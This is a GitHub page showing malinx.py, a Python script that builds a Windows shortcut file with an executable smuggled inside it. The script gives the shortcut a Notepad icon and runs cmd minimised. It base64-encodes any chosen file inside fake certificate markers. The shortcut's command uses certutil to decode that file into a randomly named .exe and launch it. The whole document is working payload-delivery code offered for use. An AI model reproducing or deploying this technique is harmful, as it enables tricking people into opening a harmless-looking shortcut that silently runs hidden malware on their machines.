-
Notifications
You must be signed in to change notification settings - Fork 5
/
malinx.py
67 lines (48 loc) · 1.99 KB
/
malinx.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
#!/usr/bin/env python3
# Jean-Pierre LESUEUR (@DarkCoderSc)
# https://keybase.io/phrozen
# Requirements:
# -> pip install pypiwin32
# -> pip install winshell
import argparse
import base64
import os
import pathlib
import random
import string
import winshell
def build_shortcut(file_to_embed, shortcut_name):
output_shortcut = "{}{}.lnk".format(
os.path.join(pathlib.Path(__file__).parent.resolve(), ''),
shortcut_name,
)
with winshell.shortcut(output_shortcut) as shortcut:
# @echo off & (for %i in (.lnk) do certutil -decode %i [filename]) & start [filename].exe
payload = "@echo off&(for %i in (*.lnk) do certutil -decode %i {0}.exe)&start {0}.exe".format(
"".join(random.choice(string.ascii_letters) for i in range(8))
)
shortcut.description = ""
shortcut.show_cmd = "min"
shortcut.working_directory = ""
shortcut.path = "%COMSPEC%"
shortcut.arguments = "/c \"{}".format(
payload,
)
shortcut.icon_location = ("%windir%\\notepad.exe", 0)
with open(file_to_embed, "rb") as file:
encoded_content = base64.b64encode(file.read())
with open(output_shortcut, "ab") as file:
file.write(b"-----BEGIN CERTIFICATE-----")
file.write(encoded_content)
file.write(b"-----END CERTIFICATE-----")
print("[+] Shortcut generated: \"{}\"".format(output_shortcut))
if __name__ == "__main__":
parser = argparse.ArgumentParser(description=f"Create Windows Shortcut with Self-Extracting Embedded File.")
parser.add_argument('-f', '--embed-file', type=str, dest="embed_file", required=True, help="File to inject in shortcut.")
parser.add_argument('-n', '--shorcut-name', type=str, dest="shortcut_name", required=True, help="Generated shortcut name.")
try:
argv = parser.parse_args()
except IOError as e:
parser.error()
build_shortcut(argv.embed_file, argv.shortcut_name)
print("[+] Done.")